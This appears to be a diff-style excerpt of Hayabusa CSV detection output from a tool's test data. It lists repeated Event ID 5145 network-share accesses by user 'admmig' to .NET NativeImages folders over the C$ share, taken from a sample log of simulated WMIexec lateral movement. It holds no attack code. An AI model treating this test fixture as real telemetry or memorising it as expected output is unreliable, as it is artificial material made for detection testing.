+2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Security\ba6ea4732f569e0674d6a43a82de5cc2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006#\09e0258d6e4a9d467c32dc8ac58766f2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02#\c97638c574cae07911907fa19e2aeedd | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.803 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.819 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e#\e9302436a2c607db888bcb3b14ebba8e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78#\5e015d37aa3fdc75648e9d00d44d13ac | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.866 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9#\3c06d012b88601107a4449fb04067a20 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458#\67f143e1f5d81dae33879b84e0035cad | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512#\03d76bf2a39a57e8bed74e782c62fd1c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\ee53227bcc4430088d0b560752c1cd02 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522#\39bc23d9592ef276c70a36ef0311070a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\4c3126aec3364546e4ade89c24c4e742 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech\6d5f82d8178e3d8e9931e70dce584863 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions\95c749867e5f72a09ed1e59a57931301 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web\90285827b1300835ca1aaff1dff83a01 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a#\3dde15282321aa41c609dc7f7a5f1af5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4#\61d489d8a768782ce394f299dcc0e4bb | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9#\f2c2cff3fa34c990079298396b1ec1fc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a#\4b7763786015950c44dbba0ff26b883e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b#\af89139de3b87146c705fa989eeaa4b1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b#\db42d61826797328b8b368348c6b3f13 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486#\9de316f43fe18621a13deefe7dbbbc27 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.078 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5#\5a669ebdf74fb2c8f0d8148b4f79b9a2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77#\81722d79b43d0329413516f10c3faf60 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6#\cd0ef620fc82b9dab224ae428bb2a910 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity\0023a84796c78827e3d0176900ba5b59 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile\84ecb78e3635883e1cf8acae1dec527e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
